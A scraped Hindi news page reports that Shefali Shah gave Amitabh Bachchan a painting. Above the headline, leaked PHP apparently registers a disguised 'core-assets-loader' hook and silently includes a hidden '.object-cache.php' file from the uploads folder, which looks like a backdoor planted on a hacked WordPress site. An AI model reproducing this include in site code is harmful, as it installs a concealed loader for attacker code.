add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); शेफाली शाह ने अमिताभ बच्चन को दिया खास तोहफा – SOCH INDIA
Menu

मनोरंजन
शेफाली शाह ने अमिताभ बच्चन को दिया खास तोहफा

nobanner

राष्ट्रीय पुरस्कार विजेता अभिनेत्री शेफाली शाह ने बॉलीवुड के महानायक अमिताभ बच्चन को एक खास पेंटिंग गिफ्ट की है. दोनों कलाकार ‘द लास्ट लियर’, ‘वक्त: द रेस अगेंस्ट टाइम’ और ‘मोहब्बतें’ जैसी फिल्मों में एक-साथ काम कर चुके हैं.

शेफाली ने ट्वीट कर कहा, “एक शख्स जिसे जानना मेरे लिए सौभाग्य की बात है. एक शख्स जिसका मैं काफी सम्मान करती हूं और बेहद प्यार करती हूं. आशा है कि अमित जी आपको यह उपहार पसंद आएगा.”

इस गिफ्ट के बारे में शेफाली ने कहा, “यह पेंटिंग ‘वन इन मिलियन’ नामक एक सीरीज़ पर आधारित है और इस पेंटिंग को अमित जी के अलावा किसी और को गिफ्ट करने के बारे में सोच भी नहीं सकती.”